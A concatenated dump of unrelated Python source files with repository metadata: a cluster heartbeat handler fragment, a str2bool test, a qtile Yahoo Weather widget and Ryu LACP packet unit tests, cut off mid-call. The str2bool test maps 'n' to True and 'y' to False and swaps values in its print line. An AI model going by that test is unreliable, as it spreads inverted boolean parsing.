# because the master or slave do not maintain an explicit state about when and why the slave was marked
# dead. It is a lot cleaner for the heartbeat functionality to indicate an heartbeat failure and let the
# slave make a decision based on that.
is_alive = self._cluster_master.update_slave_last_heartbeat_time(slave)
self.write({'is_alive': is_alive})
|
apache-2.0
|
overtherain/scriptfile
|
software/googleAppEngine/lib/grizzled/grizzled/test/text/TestStr2Bool.py
|
19
|
1741
|
#!/usr/bin/python2.4
# $Id: 99b27c0fb42453577338855a901665a65a027dd4 $
#
# Nose program for testing grizzled.file classes/functions
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
import google3
from grizzled.text import str2bool
# ---------------------------------------------------------------------------
# Globals
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# Classes
# ---------------------------------------------------------------------------
class TestStr2Bool(object):
def testGoodStrings(self):
for s, expected in (('false', False,),
('true', True,),
('f', False,),
('t', True,),
('no', False,),
('yes', True,),
('n', True,),
('y', False,),
('0', False,),
('1', True,)):
for s2 in (s, s.upper(), s.capitalize()):
val = str2bool(s2)
print '"%s" -> %s. Expected=%s' % (s2, expected, val)
assert val == expected, \
'"%s" does not produce expected %s' % (s2, expected)
def testBadStrings(self):
for s in ('foo', 'bar', 'xxx', 'yyy', ''):
try:
str2bool(s)
assert False, 'Expected "%s" to produce an exception' % s
except ValueError:
pass
|
mit
|
kiniou/qtile
|
libqtile/widget/yahoo_weather.py
|
2
|
5080
|
# -*- coding:utf-8 -*-
# Copyright (c) 2011-2012 dmpayton
# Copyright (c) 2011 Kenji_Takahashi
# Copyright (c) 2011 Mounier Florian
# Copyright (c) 2012, 2014-2015 Tycho Andersen
# Copyright (c) 2013 David R. Andersen
# Copyright (c) 2013 Tao Sauvage
# Copyright (c) 2014 Sean Vig
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# -*- coding: utf-8 -*-
from .generic_poll_text import GenPollUrl
from xml.dom import minidom
from six.moves.urllib.parse import urlencode
QUERY_URL = 'http://query.yahooapis.com/v1/public/yql?'
WEATHER_URL = 'http://weather.yahooapis.com/forecastrss?'
WEATHER_NS = 'http://xml.weather.yahoo.com/ns/rss/1.0'
class YahooWeather(GenPollUrl):
''' A weather widget, data provided by the Yahoo! Weather API
Format options:
- astronomy_sunrise
- astronomy_sunset
- atmosphere_humidity
- atmosphere_visibility
- atmosphere_pressure
- atmosphere_rising
- condition_text
- condition_code
- condition_temp
- condition_date
- location_city
- location_region
- location_country
- units_temperature
- units_distance
- units_pressure
- units_speed
- wind_chill
'''
defaults = [
# One of (location, woeid) must be set.
(
'location',
None,
'Location to fetch weather for. Ignored if woeid is set.'
),
(
'woeid',
None,
'Where On Earth ID. Auto-calculated if location is set.'
),
(
'format',
'{location_city}: {condition_temp} °{units_temperature}',
'Display format'
),
('metric', True, 'True to use metric/C, False to use imperial/F'),
('up', '^', 'symbol for rising atmospheric pressure'),
('down', 'v', 'symbol for falling atmospheric pressure'),
('steady', 's', 'symbol for steady atmospheric pressure'),
]
json = False
def __init__(self, **config):
GenPollUrl.__init__(self, **config)
self.add_defaults(YahooWeather.defaults)
self._url = None
def fetch_woeid(self, location):
url = QUERY_URL + urlencode({
'q': 'select woeid from geo.places where text="%s"' % location,
'format': 'json'
})
data = self.fetch(url)
if data['query']['count'] > 1:
return data['query']['results']['place'][0]['woeid']
return data['query']['results']['place']['woeid']
@property
def url(self):
if self._url:
return self._url
if not self.woeid:
if self.location:
self.woeid = self.fetch_woeid(self.location)
if not self.woeid:
return None
format = 'c' if self.metric else 'f'
self._url = WEATHER_URL + urlencode({'w': self.woeid, 'u': format})
return self._url
def parse(self, body):
dom = minidom.parseString(body)
structure = (
('location', ('city', 'region', 'country')),
('units', ('temperature', 'distance', 'pressure', 'speed')),
('wind', ('chill', 'direction', 'speed')),
('atmosphere', ('humidity', 'visibility', 'pressure', 'rising')),
('astronomy', ('sunrise', 'sunset')),
('condition', ('text', 'code', 'temp', 'date'))
)
data = {}
for tag, attrs in structure:
element = dom.getElementsByTagNameNS(WEATHER_NS, tag)[0]
for attr in attrs:
data['%s_%s' % (tag, attr)] = element.getAttribute(attr)
if data['atmosphere_rising'] == '0':
data['atmosphere_rising'] = self.steady
elif data['atmosphere_rising'] == '1':
data['atmosphere_rising'] = self.up
elif data['atmosphere_rising'] == '2':
data['atmosphere_rising'] = self.down
return self.format.format(**data)
|
mit
|
torufuru/oolhackathon
|
ryu/tests/unit/packet/test_slow.py
|
29
|
45511
|
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import unittest
import logging
import copy
from struct import pack, unpack_from
from nose.tools import ok_, eq_, raises
from ryu.ofproto import ether
from ryu.lib.packet.ethernet import ethernet
from ryu.lib.packet.packet import Packet
from ryu.lib import addrconv
from ryu.lib.packet.slow import slow, lacp
from ryu.lib.packet.slow import SLOW_PROTOCOL_MULTICAST
from ryu.lib.packet.slow import SLOW_SUBTYPE_LACP
from ryu.lib.packet.slow import SLOW_SUBTYPE_MARKER
LOG = logging.getLogger(__name__)
class Test_slow(unittest.TestCase):
""" Test case for Slow Protocol
"""
def setUp(self):
self.subtype = SLOW_SUBTYPE_LACP
self.version = lacp.LACP_VERSION_NUMBER
self.actor_tag = lacp.LACP_TLV_TYPE_ACTOR
self.actor_length = 20
self.actor_system_priority = 65534
self.actor_system = '00:07:0d:af:f4:54'
self.actor_key = 1
self.actor_port_priority = 65535
self.actor_port = 1
self.actor_state_activity = lacp.LACP_STATE_ACTIVE
self.actor_state_timeout = lacp.LACP_STATE_LONG_TIMEOUT
self.actor_state_aggregation = lacp.LACP_STATE_AGGREGATEABLE
self.actor_state_synchronization = lacp.LACP_STATE_IN_SYNC
self.actor_state_collecting = lacp.LACP_STATE_COLLECTING_ENABLED
self.actor_state_distributing = lacp.LACP_STATE_DISTRIBUTING_ENABLED
self.actor_state_defaulted = lacp.LACP_STATE_OPERATIONAL_PARTNER
self.actor_state_expired = lacp.LACP_STATE_EXPIRED
self.actor_state = (
(self.actor_state_activity << 0) |
(self.actor_state_timeout << 1) |
(self.actor_state_aggregation << 2) |
(self.actor_state_synchronization << 3) |
(self.actor_state_collecting << 4) |
(self.actor_state_distributing << 5) |
(self.actor_state_defaulted << 6) |
(self.actor_state_expired << 7))
self.partner_tag = lacp.LACP_TLV_TYPE_PARTNER
self.partner_length = 20
self.partner_system_priority = 0
self.partner_system = '00:00:00:00:00:00'
self.partner_key = 0
self.partner_port_priority = 0
self.partner_port = 0
self.partner_state_activity = 0
self.partner_state_timeout = lacp.LACP_STATE_SHORT_TIMEOUT
self.partner_state_aggregation = 0
self.partner_state_synchronization = 0
self.partner_state_collecting = 0
self.partner_state_distributing = 0
self.partner_state_defaulted = 0
self.partner_state_expired = 0
self.partner_state = (
(self.partner_state_activity << 0) |
(self.partner_state_timeout << 1) |
(self.partner_state_aggregation << 2) |
(self.partner_state_synchronization << 3) |
(self.partner_state_collecting << 4) |
(self.partner_state_distributing << 5) |
(self.partner_state_defaulted << 6) |
(self.partner_state_expired << 7))
self.collector_tag = lacp.LACP_TLV_TYPE_COLLECTOR
self.collector_length = 16
self.collector_max_delay = 0
self.terminator_tag = lacp.LACP_TLV_TYPE_TERMINATOR
self.terminator_length = 0
self.head_fmt = lacp._HLEN_PACK_STR
self.head_len = lacp._HLEN_PACK_LEN
self.act_fmt = lacp._ACTPRT_INFO_PACK_STR
self.act_len = lacp._ACTPRT_INFO_PACK_LEN
self.prt_fmt = lacp._ACTPRT_INFO_PACK_STR
self.prt_len = lacp._ACTPRT_INFO_PACK_LEN
self.col_fmt = lacp._COL_INFO_PACK_STR
self.col_len = lacp._COL_INFO_PACK_LEN
self.trm_fmt = lacp._TRM_PACK_STR
self.trm_len = lacp._TRM_PACK_LEN
self.length = lacp._ALL_PACK_LEN
self.head_buf = pack(self.head_fmt,
self.subtype,
self.version)
self.act_buf = pack(self.act_fmt,
self.actor_tag,
self.actor_length,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state)
self.prt_buf = pack(self.prt_fmt,
self.partner_tag,
self.partner_length,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state)
self.col_buf = pack(self.col_fmt,
self.collector_tag,
self.collector_length,
self.collector_max_delay)
self.trm_buf = pack(self.trm_fmt,
self.terminator_tag,
self.terminator_length)
self.buf = self.head_buf + self.act_buf + self.prt_buf + \
self.col_buf + self.trm_buf
def tearDown(self):
pass
def test_parser(self):
slow.parser(self.buf)
def test_not_implemented_subtype(self):
not_implemented_buf = str(SLOW_SUBTYPE_MARKER) + self.buf[1:]
(instance, nexttype, last) = slow.parser(not_implemented_buf)
assert None == instance
assert None == nexttype
assert None != last
def test_invalid_subtype(self):
invalid_buf = "\xff" + self.buf[1:]
(instance, nexttype, last) = slow.parser(invalid_buf)
assert None == instance
assert None == nexttype
assert None != last
class Test_lacp(unittest.TestCase):
""" Test case for lacp
"""
def setUp(self):
self.subtype = SLOW_SUBTYPE_LACP
self.version = lacp.LACP_VERSION_NUMBER
self.actor_tag = lacp.LACP_TLV_TYPE_ACTOR
self.actor_length = 20
self.actor_system_priority = 65534
self.actor_system = '00:07:0d:af:f4:54'
self.actor_key = 1
self.actor_port_priority = 65535
self.actor_port = 1
self.actor_state_activity = lacp.LACP_STATE_ACTIVE
self.actor_state_timeout = lacp.LACP_STATE_LONG_TIMEOUT
self.actor_state_aggregation = lacp.LACP_STATE_AGGREGATEABLE
self.actor_state_synchronization = lacp.LACP_STATE_IN_SYNC
self.actor_state_collecting = lacp.LACP_STATE_COLLECTING_ENABLED
self.actor_state_distributing = lacp.LACP_STATE_DISTRIBUTING_ENABLED
self.actor_state_defaulted = lacp.LACP_STATE_OPERATIONAL_PARTNER
self.actor_state_expired = lacp.LACP_STATE_EXPIRED
self.actor_state = (
(self.actor_state_activity << 0) |
(self.actor_state_timeout << 1) |
(self.actor_state_aggregation << 2) |
(self.actor_state_synchronization << 3) |
(self.actor_state_collecting << 4) |
(self.actor_state_distributing << 5) |
(self.actor_state_defaulted << 6) |
(self.actor_state_expired << 7))
self.partner_tag = lacp.LACP_TLV_TYPE_PARTNER
self.partner_length = 20
self.partner_system_priority = 0
self.partner_system = '00:00:00:00:00:00'
self.partner_key = 0
self.partner_port_priority = 0
self.partner_port = 0
self.partner_state_activity = 0
self.partner_state_timeout = lacp.LACP_STATE_SHORT_TIMEOUT
self.partner_state_aggregation = 0
self.partner_state_synchronization = 0
self.partner_state_collecting = 0
self.partner_state_distributing = 0
self.partner_state_defaulted = 0
self.partner_state_expired = 0
self.partner_state = (
(self.partner_state_activity << 0) |
(self.partner_state_timeout << 1) |
(self.partner_state_aggregation << 2) |
(self.partner_state_synchronization << 3) |
(self.partner_state_collecting << 4) |
(self.partner_state_distributing << 5) |
(self.partner_state_defaulted << 6) |
(self.partner_state_expired << 7))
self.collector_tag = lacp.LACP_TLV_TYPE_COLLECTOR
self.collector_length = 16
self.collector_max_delay = 0
self.terminator_tag = lacp.LACP_TLV_TYPE_TERMINATOR
self.terminator_length = 0
self.head_fmt = lacp._HLEN_PACK_STR
self.head_len = lacp._HLEN_PACK_LEN
self.act_fmt = lacp._ACTPRT_INFO_PACK_STR
self.act_len = lacp._ACTPRT_INFO_PACK_LEN
self.prt_fmt = lacp._ACTPRT_INFO_PACK_STR
self.prt_len = lacp._ACTPRT_INFO_PACK_LEN
self.col_fmt = lacp._COL_INFO_PACK_STR
self.col_len = lacp._COL_INFO_PACK_LEN
self.trm_fmt = lacp._TRM_PACK_STR
self.trm_len = lacp._TRM_PACK_LEN
self.length = lacp._ALL_PACK_LEN
self.head_buf = pack(self.head_fmt,
self.subtype,
self.version)
self.act_buf = pack(self.act_fmt,
self.actor_tag,
self.actor_length,
self.actor_system_priority,
addrconv.mac.text_to_bin(self.actor_system),
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state)
self.prt_buf = pack(self.prt_fmt,
self.partner_tag,
self.partner_length,
self.partner_system_priority,
addrconv.mac.text_to_bin(self.partner_system),
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state)
self.col_buf = pack(self.col_fmt,
self.collector_tag,
self.collector_length,
self.collector_max_delay)
self.trm_buf = pack(self.trm_fmt,
self.terminator_tag,
self.terminator_length)
self.buf = self.head_buf + self.act_buf + self.prt_buf + \
self.col_buf + self.trm_buf
self.l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
def tearDown(self):
pass
def find_protocol(self, pkt, name):
for p in pkt.protocols:
if p.protocol_name == name:
return p
def test_init(self):
eq_(self.subtype, self.l._subtype)
eq_(self.version, self.l.version)
eq_(self.actor_tag, self.l._actor_tag)
eq_(self.actor_length, self.l._actor_length)
eq_(self.actor_system_priority, self.l.actor_system_priority)
eq_(self.actor_system, self.l.actor_system)
eq_(self.actor_key, self.l.actor_key)
eq_(self.actor_port_priority, self.l.actor_port_priority)
eq_(self.actor_port, self.l.actor_port)
eq_(self.actor_state_activity, self.l.actor_state_activity)
eq_(self.actor_state_timeout, self.l.actor_state_timeout)
eq_(self.actor_state_aggregation,
self.l.actor_state_aggregation)
eq_(self.actor_state_synchronization,
self.l.actor_state_synchronization)
eq_(self.actor_state_collecting,
self.l.actor_state_collecting)
eq_(self.actor_state_distributing,
self.l.actor_state_distributing)
eq_(self.actor_state_defaulted, self.l.actor_state_defaulted)
eq_(self.actor_state_expired, self.l.actor_state_expired)
eq_(self.actor_state, self.l._actor_state)
eq_(self.partner_tag, self.l._partner_tag)
eq_(self.partner_length, self.l._partner_length)
eq_(self.partner_system_priority,
self.l.partner_system_priority)
eq_(self.partner_system, self.l.partner_system)
eq_(self.partner_key, self.l.partner_key)
eq_(self.partner_port_priority, self.l.partner_port_priority)
eq_(self.partner_port, self.l.partner_port)
eq_(self.partner_state_activity, self.l.partner_state_activity)
eq_(self.partner_state_timeout, self.l.partner_state_timeout)
eq_(self.partner_state_aggregation,
self.l.partner_state_aggregation)
eq_(self.partner_state_synchronization,
self.l.partner_state_synchronization)
eq_(self.partner_state_collecting,
self.l.partner_state_collecting)
eq_(self.partner_state_distributing,
self.l.partner_state_distributing)
eq_(self.partner_state_defaulted,
self.l.partner_state_defaulted)
eq_(self.partner_state_expired, self.l.partner_state_expired)
eq_(self.partner_state, self.l._partner_state)
eq_(self.collector_tag, self.l._collector_tag)
eq_(self.collector_length, self.l._collector_length)
eq_(self.collector_max_delay, self.l.collector_max_delay)
eq_(self.terminator_tag, self.l._terminator_tag)
eq_(self.terminator_length, self.l._terminator_length)
def test_parser(self):
_res = self.l.parser(self.buf)
if type(_res) is tuple:
res = _res[0]
else:
res = _res
eq_(res._subtype, self.subtype)
eq_(res.version, self.version)
eq_(res._actor_tag, self.actor_tag)
eq_(res._actor_length, self.actor_length)
eq_(res.actor_system_priority, self.actor_system_priority)
eq_(res.actor_system, self.actor_system)
eq_(res.actor_key, self.actor_key)
eq_(res.actor_port_priority, self.actor_port_priority)
eq_(res.actor_port, self.actor_port)
eq_(res.actor_state_activity, self.actor_state_activity)
eq_(res.actor_state_timeout, self.actor_state_timeout)
eq_(res.actor_state_aggregation, self.actor_state_aggregation)
eq_(res.actor_state_synchronization,
self.actor_state_synchronization)
eq_(res.actor_state_collecting, self.actor_state_collecting)
eq_(res.actor_state_distributing, self.actor_state_distributing)
eq_(res.actor_state_defaulted, self.actor_state_defaulted)
eq_(res.actor_state_expired, self.actor_state_expired)
eq_(res._actor_state, self.actor_state)
eq_(res._partner_tag, self.partner_tag)
eq_(res._partner_length, self.partner_length)
eq_(res.partner_system_priority, self.partner_system_priority)
eq_(res.partner_system, self.partner_system)
eq_(res.partner_key, self.partner_key)
eq_(res.partner_port_priority, self.partner_port_priority)
eq_(res.partner_port, self.partner_port)
eq_(res.partner_state_activity, self.partner_state_activity)
eq_(res.partner_state_timeout, self.partner_state_timeout)
eq_(res.partner_state_aggregation,
self.partner_state_aggregation)
eq_(res.partner_state_synchronization,
self.partner_state_synchronization)
eq_(res.partner_state_collecting, self.partner_state_collecting)
eq_(res.partner_state_distributing,
self.partner_state_distributing)
eq_(res.partner_state_defaulted, self.partner_state_defaulted)
eq_(res.partner_state_expired, self.partner_state_expired)
eq_(res._partner_state, self.partner_state)
eq_(res._collector_tag, self.collector_tag)
eq_(res._collector_length, self.collector_length)
eq_(res.collector_max_delay, self.collector_max_delay)
eq_(res._terminator_tag, self.terminator_tag)
eq_(res._terminator_length, self.terminator_length)
def test_serialize(self):
data = bytearray()
prev = None
buf = self.l.serialize(data, prev)
offset = 0
head_res = unpack_from(self.head_fmt, buf, offset)
offset += self.head_len
act_res = unpack_from(self.act_fmt, buf, offset)
offset += self.act_len
prt_res = unpack_from(self.prt_fmt, buf, offset)
offset += self.prt_len
col_res = unpack_from(self.col_fmt, buf, offset)
offset += self.col_len
trm_res = unpack_from(self.trm_fmt, buf, offset)
eq_(head_res[0], self.subtype)
eq_(head_res[1], self.version)
eq_(act_res[0], self.actor_tag)
eq_(act_res[1], self.actor_length)
eq_(act_res[2], self.actor_system_priority)
eq_(act_res[3], addrconv.mac.text_to_bin(self.actor_system))
eq_(act_res[4], self.actor_key)
eq_(act_res[5], self.actor_port_priority)
eq_(act_res[6], self.actor_port)
eq_(act_res[7], self.actor_state)
eq_(prt_res[0], self.partner_tag)
eq_(prt_res[1], self.partner_length)
eq_(prt_res[2], self.partner_system_priority)
eq_(prt_res[3], addrconv.mac.text_to_bin(self.partner_system))
eq_(prt_res[4], self.partner_key)
eq_(prt_res[5], self.partner_port_priority)
eq_(prt_res[6], self.partner_port)
eq_(prt_res[7], self.partner_state)
eq_(col_res[0], self.collector_tag)
eq_(col_res[1], self.collector_length)
eq_(col_res[2], self.collector_max_delay)
eq_(trm_res[0], self.terminator_tag)
eq_(trm_res[1], self.terminator_length)
def _build_lacp(self):
ethertype = ether.ETH_TYPE_SLOW
dst = SLOW_PROTOCOL_MULTICAST
e = ethernet(dst, self.actor_system, ethertype)
p = Packet()
p.add_protocol(e)
p.add_protocol(self.l)
p.serialize()
return p
def test_build_lacp(self):
p = self._build_lacp()
e = self.find_protocol(p, "ethernet")
ok_(e)
eq_(e.ethertype, ether.ETH_TYPE_SLOW)
l = self.find_protocol(p, "lacp")
ok_(l)
eq_(l._subtype, self.subtype)
eq_(l.version, self.version)
eq_(l._actor_tag, self.actor_tag)
eq_(l._actor_length, self.actor_length)
eq_(l.actor_system_priority, self.actor_system_priority)
eq_(l.actor_system, self.actor_system)
eq_(l.actor_key, self.actor_key)
eq_(l.actor_port_priority, self.actor_port_priority)
eq_(l.actor_port, self.actor_port)
eq_(l.actor_state_activity, self.actor_state_activity)
eq_(l.actor_state_timeout, self.actor_state_timeout)
eq_(l.actor_state_aggregation, self.actor_state_aggregation)
eq_(l.actor_state_synchronization,
self.actor_state_synchronization)
eq_(l.actor_state_collecting, self.actor_state_collecting)
eq_(l.actor_state_distributing, self.actor_state_distributing)
eq_(l.actor_state_defaulted, self.actor_state_defaulted)
eq_(l.actor_state_expired, self.actor_state_expired)
eq_(l._actor_state, self.actor_state)
eq_(l._partner_tag, self.partner_tag)
eq_(l._partner_length, self.partner_length)
eq_(l.partner_system_priority, self.partner_system_priority)
eq_(l.partner_system, self.partner_system)
eq_(l.partner_key, self.partner_key)
eq_(l.partner_port_priority, self.partner_port_priority)
eq_(l.partner_port, self.partner_port)
eq_(l.partner_state_activity, self.partner_state_activity)
eq_(l.partner_state_timeout, self.partner_state_timeout)
eq_(l.partner_state_aggregation, self.partner_state_aggregation)
eq_(l.partner_state_synchronization,
self.partner_state_synchronization)
eq_(l.partner_state_collecting, self.partner_state_collecting)
eq_(l.partner_state_distributing,
self.partner_state_distributing)
eq_(l.partner_state_defaulted, self.partner_state_defaulted)
eq_(l.partner_state_expired, self.partner_state_expired)
eq_(l._partner_state, self.partner_state)
eq_(l._collector_tag, self.collector_tag)
eq_(l._collector_length, self.collector_length)
eq_(l.collector_max_delay, self.collector_max_delay)
eq_(l._terminator_tag, self.terminator_tag)
eq_(l._terminator_length, self.terminator_length)
@raises(Exception)
def test_malformed_lacp(self):
m_short_buf = self.buf[1:self.length]
slow.parser(m_short_buf)
@raises(Exception)
def test_invalid_subtype(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.subtype = 0xff
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_version(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.version = 0xff
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_actor_tag(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.actor_tag = 0x04
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_actor_length(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.actor_length = 50
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_partner_tag(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.partner_tag = 0x01
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_partner_length(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.partner_length = 0
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_collector_tag(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.collector_tag = 0x00
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_collector_length(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.collector_length = 20
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_terminator_tag(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.terminator_tag = 0x04
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_terminator_length(self):
invalid_lacv = copy.deepcopy(self.l)
invalid_lacv.terminator_length = self.trm_len
invalid_buf = invalid_lacv.serialize()
slow.parser(invalid_buf)
@raises(Exception)
def test_invalid_actor_state_activity(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
2,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_actor_state_timeout(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
2,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_actor_state_aggregation(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
2,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_actor_state_synchronization(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
2,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_actor_state_collecting(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
2,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_actor_state_distributing(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
2,
self.actor_state_defaulted,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_actor_state_defaulted(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
2,
self.actor_state_expired,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_actor_state_expired(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
2,
self.partner_system_priority,
self.partner_system,
self.partner_key,
self.partner_port_priority,
self.partner_port,
self.partner_state_activity,
self.partner_state_timeout,
self.partner_state_aggregation,
self.partner_state_synchronization,
self.partner_state_collecting,
self.partner_state_distributing,
self.partner_state_defaulted,
self.partner_state_expired,
self.collector_max_delay)
l.serialize()
@raises(Exception)
def test_invalid_partner_state_activity(self):
l = lacp(self.version,
self.actor_system_priority,
self.actor_system,
self.actor_key,
self.actor_port_priority,
self.actor_port,
self.actor_state_activity,
self.actor_state_timeout,
self.actor_state_aggregation,
self.actor_state_synchronization,
self.actor_state_collecting,
self.actor_state_distributing,
self.actor_state_defaulted,
self.actor_state_expired,
